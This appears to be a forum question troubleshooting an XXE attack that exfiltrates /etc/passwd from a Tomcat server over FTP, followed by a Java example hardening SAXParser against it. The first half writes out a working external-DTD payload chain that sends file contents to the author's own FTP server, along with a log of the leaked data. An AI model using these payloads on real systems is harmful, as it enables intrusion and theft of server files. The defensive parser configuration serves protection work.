
Exfiltration through FTP using XXE on a Tomcat server

Çağlar Arlı


I'm trying to extract binary data from a Tomcat server that is using SAXParser. For my FTP server, I am using this source. I'm hosting two DTDs on GitHub Gist. These are their contents:

Base XML (What gets sent to the server):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data SYSTEM "https://gist.githubusercontent.com/.../a.dtd">
<a>
<b>&send;</b>
</a>

a.dtd (first DTD payload):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "https://gist.githubusercontent.com/.../b.dtd">
%dtd;

b.dtd (final DTD payload):

<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://[my server ip]:2121/%file;'>">
%all;

The reason I am trying to extract /etc/passwd is that I am trying to target a binary file, but when that didn't work, I thought I'd start with something simple. I have confirmed that I have access to /etc/passwd (I originally retrieved it as an entity).

The FTP server works fine and I made sure the port was open. This is the output when the above is executed.

[WEB] Starting webserver on 0.0.0.0:8888...
[FTP] Starting FTP server on 0.0.0.0:2121...
[FTP] x has connected
[FTP] Received:
USER anonymous
[FTP] Received:
PASS Java1.8.0_131@
[FTP] > 230 more data please!
[FTP] Received:
TYPE I
[FTP] > 230 more data please!
[FTP] Received:
CWD root:x:0:0:root:
[FTP] > 230 more data please!
[FTP] Received:
CWD root:
[FTP] > 230 more data please!
[FTP] Received:
CWD bin
[FTP] > 230 more data please!
[FTP] Received:
QUIT
[FTP] > 230 more data please!
[FTP] Received:

... (a lot more blank like above)
[FTP] > 230 more data please!
[FTP] Received:

[FTP] > 230 more data please!
[FTP] Client error: [Errno 32] Broken pipe
[FTP] Connection closed with x

An issue I found while answering Luc's question is an interesting one. Basically, if the data has any slashes, the FTP client interprets it as a folder? Unsure why it stops though. Perhaps I have to write a proper response mechanism so when a CWD command comes through I give it OK or another related response.
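The chain in the question only works because the server-side SAXParser is willing to fetch the external DTD named in the DOCTYPE and then resolve parameter entities from it. The following is an added example, not code from the post or from the FTP server source it links to, showing how a Tomcat-side parser would be configured so that such a document is rejected before any network request is made. The gist URL is replaced by a labelled placeholder; the feature URIs are the standard Xerces ones shipped with the JDK's built-in parser.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

/**
 * Added example (not from the original post): a SAXParserFactory configured so
 * that a document carrying a DOCTYPE, and therefore any external general or
 * parameter entity, is rejected before the parser fetches anything.
 */
public class HardenedSaxDemo {

    /** Builds a factory whose parsers refuse DTDs and external entities. */
    public static SAXParserFactory newHardenedFactory()
            throws ParserConfigurationException, SAXException {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // Primary control: any <!DOCTYPE ...> is a fatal error, so the
        // a.dtd -> b.dtd -> ftp:// chain from the post never starts.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for deployments that must tolerate a DOCTYPE:
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        return factory;
    }

    /** Parses the document; returns true when accepted, false when rejected. */
    public static boolean parseSafely(SAXParserFactory factory, String xml)
            throws ParserConfigurationException, SAXException, IOException {
        SAXParser parser = factory.newSAXParser();
        try {
            // DefaultHandler rethrows fatal errors, so a disallowed DOCTYPE
            // surfaces here as a SAXParseException.
            parser.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                         new DefaultHandler());
            return true;
        } catch (SAXParseException e) {
            // Log the position only; echoing the document back in an error
            // page would itself leak resolved entity content.
            System.err.println("Rejected XML at line " + e.getLineNumber()
                               + ": " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        SAXParserFactory factory = newHardenedFactory();

        // The post's base document, with the gist URL replaced by a placeholder.
        String xxe = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE data SYSTEM \"https://PLACEHOLDER.example/a.dtd\">\n"
                + "<a><b>&send;</b></a>";
        // A constructed benign document with the same element structure.
        String benign = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><a><b>hello</b></a>";

        System.out.println("XXE document accepted? " + parseSafely(factory, xxe));
        System.out.println("Benign document accepted? " + parseSafely(factory, benign));
    }
}
```

The `disallow-doctype-decl` feature alone stops the technique described in the question, since the parser never reads a.dtd and so never learns about the `ftp://` entity. The other features matter when an application genuinely needs inline DTDs; they stop the parser from following external references while still accepting a local DOCTYPE. The `http://apache.org/...` URIs are specific to Xerces-derived parsers (the JDK default and Tomcat's usual choice); a different SAX implementation will throw `SAXNotRecognizedException` on them, which is the right time to check that implementation's own switch for external entity loading.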